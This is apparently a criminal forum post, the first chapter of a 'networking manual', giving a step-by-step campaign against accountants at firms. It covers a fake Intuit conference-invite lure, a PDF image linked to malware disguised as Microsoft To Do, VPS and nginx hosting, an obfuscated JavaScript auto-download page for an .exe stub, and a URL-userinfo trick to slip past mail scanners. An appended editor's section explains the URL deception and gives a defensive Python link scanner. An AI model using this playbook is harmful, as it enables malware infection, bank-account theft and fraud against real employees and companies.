
Article [KSROSKIS NETWORKING MANUAL 1.0] Chapter 1: Corporate Certified Public Accountant Malware Deployment

Posted by szcznoyov (arms, Premium; registered 01.08.2022)
This chapter will open the gateway to the subsequent chapters. We will be targeting Certified Public Accountants who are responsible for managing QuickBooks accounts and employee payments in a law/tax firm; CPAs can be found in almost every corporation in the world.

This makes targeting them provide various benefits, including access to the corporate network, QuickBooks and other payment distribution software, and based on recent attacks performed by the team, these CPAs have bank account logins saved in their Chrome profiles, which are only a step away from a 2FA bypass, because at the same time their email accounts and other social media accounts are logged in on the same profile, or on a different profile a few clicks away from the account center.

Although it all sounds sweet and warm, attacking such people can be difficult, because there are regular account alerts notifying these CPAs of potential spam; some companies go to the extent of sending out a reminder every 3 days to keep these CPAs on alert, because they have access to either half or all of the company's spending budget for the month, and a company's budget can range from $30,000 to $2M+ depending on the size and revenue of the specific company. On top of these constant reminders, some companies who have fallen victim to spam attacks or ransomware attacks issue a weekly specialised spam themselves, yes. There are companies which provide this kind of service: targeting your company with actual spam attacks, and when an employee falls victim they add them to a list, and at the end of the attack they contact each of the listed employees who fell victim to notify them that the whole thing was a test, sometimes rewarding workers who passed the tests with an additional percentage of salary.

So with this laid out, the whole thing looks more difficult, right? But no, we will not be sending attacks which look like actual spam. Besides, what percentage of corporate employees do not have social media and do not like gossiping about other workers or their partners? Almost all employees, including men, do. But wait, after gossiping and social media for various hours a week, what do they do after this matrix of media posting and reacting to posts?

They would like to relax their bodies, because their work stresses them out, with CPAs as prime examples: they sit, desktop and documents, get up, print print print, sit, get lunch, repeat. And let's be real, they hate themselves and hate most of the emails they get, so how do we exploit these people? Yeah, I think you're blind, because you just read past one exploit. Thus "sit, desktop and documents, get up, print print print, sit, get lunch, repeat": yes, we hit them with the last->first.

Which is after getting lunch. Now let's be honest right now: who would dress up in a suit, sit for hours, get annoying calls from co-workers, finally get time for some food, and right after eating go straight into serious mode? No. At this time you already had some joy just by eating lunch; even if you do not like the lunch it's still food, right? Now when you're done you will feel a little relaxed and somewhat dizzy, like when you just want to take a nap after a great meal (although don't do that, it's not advisable, you will get fat as fuck). Now this time is mostly between 12:30PM and 1:30PM. This is the time we hit them with the attack, because they are already back sitting behind their desktop and a little fatigue has kicked in, so they're just relaxing and boom, we hit them with the attack.

Now one may ask what attack exactly, because even if they are fatigued and relaxed they can still see spam with plain eyes, right? Well yes, but we won't be sending a 'Heyya, you won an iPhone 17 Pro Max using your company's program for employees, enroll now to receive your iPhone' or 'Your Microsoft account password is about to expire, click the link below to reset your account password'. NO, this is 2025, you still think even an old worker would fall for this? Maybe, but only if they work for a corporation which has $20,000 annual income. The probability is that the corp we are targeting has multi-million/billion dollar annual revenue. So we will not be using such an old trick, but rather a global conference invite. Yes, this isn't a completely never-before-seen conference, because this is a real conference which will be happening this October, so we hit them right on the dot with an email crafted with the real conference date and everything.

But that's not all; not everyone likes conferences, because they mostly have a busy schedule, and even though it sounds nice, what about the plane ticket, accommodation, food and all that, right? But no, the mailing letter will explicitly state that the accommodation, food and plane tickets have been covered by the same accounting software provider they use, which is QuickBooks, and its flight partner for the event, TravelMaster. With this there is a 95% success rate, and what makes this better is that the mailing letter will not include suspicious or fake links.

All the links inside the letter will be legitimate, actual QuickBooks domains. So how do we get the results then, right? We will add a PDF attachment which lets them fill in the form to accept the invitation to the conference, but not a direct form with fields, because that is bound to not pass detection in business mail accounts by Microsoft and its subsidiaries. Instead we embed an image, which will make the PDF look more legitimate but will not look like it's really a fake image, and to get their complete trust we will be embedding a Microsoft To Do software download image crafted as an Accept Invitation, which will boost their trust: they will actually be scheduling the conference with a software they already use for their meetings and schedules, right? But we will embed the download link to our malware on the click of this crafted image.

But remember this is a business attack; there are multiple bots and spam filters. To bypass the spam filter we will be using a Google open redirect exploit to make the main link be the legitimate Google domain, but on redirect it will go to our malware download, and we do not need to create an additional landing page for our malware, because the image in the PDF already states Accept Invitation with Microsoft To Do, and the link will have a PHP auto-download script which will trigger our malware download directly after the click. The percentage of the worker running the downloaded malware is 99%, because the downloaded malware executable will not be labeled "MyMalware"; no, the name should match the original Microsoft To Do application name to bypass the Chrome alert as well, because remember we're trying to hide in plain sight and everything needs to be inch perfect; a single mistake and your project is gone. This is the end of the seed, now enjoy the fruit.

DEPLOYMENT PHASE 1
Register an account on hostcay.com and buy a domain name with a .eu or .com TLD.
Register an account on luxhost.cc and purchase a Windows/Linux VPS; the system specification of the server does not matter.
Next, sign up for an account on Cloudflare and connect the domain to the Cloudflare account using the nameserver instructions provided by Cloudflare.

After the domain is linked to Cloudflare, log in to the purchased VPS and run the command below to install the needed software for the operation; in this manual we will be using nginx as the default web host.

sudo apt update && sudo apt upgrade -y && sudo apt install -y nginx

After nginx is installed, edit the configuration for /sites-enabled/default by running the command below to open the nano terminal-based editor.

sudo nano /etc/nginx/sites-enabled/default

After the file is open in the nano terminal-based editor, move to the bottom of the file and paste this block:
NGINX:
server {
    server_name domain;

    root /var/www/html;
    index index.php index.html index.htm;

    access_log  /var/log/nginx/domain.access.log;
    error_log   /var/log/nginx/domain.error.log;

    location / {
        try_files $uri $uri/ =404;
    }

    location ~ /\. {
        deny all;
    }

    location ~* \.(css|js|png|jpg|jpeg|gif|svg|ico|woff2?)$ {
        expires 30d;
        add_header Cache-Control "public, no-transform";
    }
}


Replace domain with the domain you linked to the VPS (without http:// or https://), then press CTRL+O and ENTER to write the changes, then CTRL+X to exit the command-line editor. Afterwards, cd into the /var/www/html directory and create a new file using the command below:

touch index.htm

Then open the file just like we opened the nginx file and paste the code below into it:
HTML:
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
<body>
    <script>
        window.onload = function() {
            const _0x1fff = 'filen';
            const _0b0101 = document.createElement('a');
            _0b0101.href = _0x1fff;
            _0b0101.download = 'filename.exe';
            document.body.appendChild(_0b0101);
            _0b0101.click();
            document.body.removeChild(_0b0101);
        };
    </script>
</body>
</html>
Replace filen with the name of your exe stub. Next we will upload our stub to the host using scp; if your stub is in your Downloads folder on your system, this is the command we will use:

scp -P port stub.exe root@ip:/var/www/html/

Replace stub.exe with the original stub name, and ip and port with the VPS's IP and SSH port. This command will ask for the VPS password; when provided, it will upload the stub to the host, and now the host auto-download without detection will be activated.

DEPLOYMENT PHASE 2
It's time to set up the mailing system, and I know most of you have a problem with mailing; as a result we made PinkGateway, an HWID-based mailer which sends without the need to buy SMTPs or consoles. But we will not be discussing PinkGateway in 1.0, since its trial credits will be available in 2.0. Now the mailing letter we will be using is a specially generated Intuit conference invitation, as seen in the figure below.

As indicated in the seed stage, the letter has no buttons and requires no clicks, and the mailing letter will include intuiit1.pdf, which is available in the Downloads section of your dashboard. With a title matching the theme, you can make the PDF auto-download our stub from our server with a single click by hyperlinking the image to our site URL, but not raw: with a legitimate leading domain,

such as "https://ask.com;@www.ourdomain.org#&hl=en-us&gl=dk/"

This will create an indirect open redirect that skips scanners, because our domain is embedded in between the characters and is not detectable unless there is a click, which will be performed by our target and not by scanners.
Now we will embed this link inside the PDF document's image using LibreOffice, which is freely available for download through the web or inside the Downloads section of this portal.
After download, we open the PDF in LibreOffice, click on the image, select the hyperlink, place our link inside, and set the Title to Microsoft To Do.
After we're done with this, we save our document and continue with the sendout. I will not be covering the means of sendout, because I will be using PinkGateway, and PinkGateway is not included in this version.
Note: Subject: IntuitConnect25 Invitation. From Name: the name specified in the closing signature of the mailing body; this makes everything look legit and prevents spam filters from blocking, by using known names.
You should receive feedback in clicks and victims, as seen in the figure below, if all is well.
Write to support if you need additional questions attended to. See you in the next chapter.

Other versions: https://privatemilitarycompany.com
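Editor's added example, not part of the post above and not code from any tool it names. The hyperlink the post builds in Phase 2 is not a redirect at all: under RFC 3986 section 3.2, everything between `//` and the last `@` of the authority is userinfo, so in `https://ask.com;@www.ourdomain.org#&hl=en-us&gl=dk/` the text `ask.com;` is a username, the host the browser actually connects to is `www.ourdomain.org`, and `ask.com` is never contacted. Browsers parse the authority the same way, which is exactly why the lure works on a reader who stops at the first dots. A mail-link scanner that parses the authority instead of reading the leading characters is not fooled. The script below does that with Python's standard library: it reports the real host, the decoy text in front of it, and what a naive left-to-right read would see, and it flags links whose userinfo looks like a domain name. The sample links are constructed for the demonstration; `www.ourdomain.org` is the post's own placeholder.

```python
"""Flag mail links that hide the real host behind userinfo in the URL authority.

Editor-added example, not the post's code. Standard library only.
The sample links at the bottom are constructed for this demonstration.
"""
import re
from urllib.parse import urlsplit

# Userinfo that is shaped like a hostname is the tell: real credentials in a
# mailed link are rare, and a username like "ask.com" exists to be read by a
# human (or a naive scanner), never by the server.
_DOMAIN_LIKE = re.compile(r"^[a-z0-9-]+(\.[a-z0-9-]+)+$", re.I)


def naive_host(url: str) -> str:
    """What a left-to-right skim (human or lazy scanner) takes to be the host:
    the text after '//' up to the first delimiter of any kind."""
    after = url.split("//", 1)[1] if "//" in url else url
    return re.split(r"[/#?;:@]", after, maxsplit=1)[0].lower()


def classify_link(url: str) -> dict:
    """Parse the authority properly and compare the real host with any decoy."""
    parts = urlsplit(url)
    real_host = (parts.hostname or "").lower()
    # netloc is the raw authority; userinfo is everything before the last '@'
    userinfo = parts.netloc.rsplit("@", 1)[0] if "@" in parts.netloc else ""
    # The lure ends the visible text with ';' so it reads as a path boundary;
    # a ':' would start a password. Strip either to recover the decoy label.
    decoy_host = re.split(r"[;:]", userinfo, maxsplit=1)[0].lower()
    suspicious = bool(
        decoy_host
        and _DOMAIN_LIKE.match(decoy_host)
        and decoy_host != real_host
    )
    return {
        "url": url,
        "real_host": real_host,
        "naive_host": naive_host(url),
        "decoy_host": decoy_host,
        "has_userinfo": bool(userinfo),
        "suspicious": suspicious,
    }


def scan_links(urls) -> list:
    """Classify every link and return only the ones worth blocking or alerting on."""
    return [r for r in (classify_link(u) for u in urls) if r["suspicious"]]


# Constructed sample set: the post's lure, a plain vendor link, and a link with
# ordinary (non-domain) userinfo that should not be flagged as a decoy.
SAMPLE_LINKS = [
    "https://ask.com;@www.ourdomain.org#&hl=en-us&gl=dk/",
    "https://quickbooks.intuit.com/",
    "https://user:token@git.example.net/repo.git",
]

if __name__ == "__main__":
    for hit in scan_links(SAMPLE_LINKS):
        print(f"{hit['url']}\n  looks like: {hit['naive_host']}"
              f"\n  connects to: {hit['real_host']}")
```

The decisive field is `real_host`, which comes from `urlsplit(...).hostname` and therefore from the same authority rule the browser applies; `naive_host` is there only to show the gap between what is read and where the click goes. A gateway rule built on this should rewrite or drop any link whose `decoy_host` is domain-like and differs from `real_host`, and it should log `has_userinfo` links even when they are not flagged, since credentials in mailed URLs are almost never legitimate.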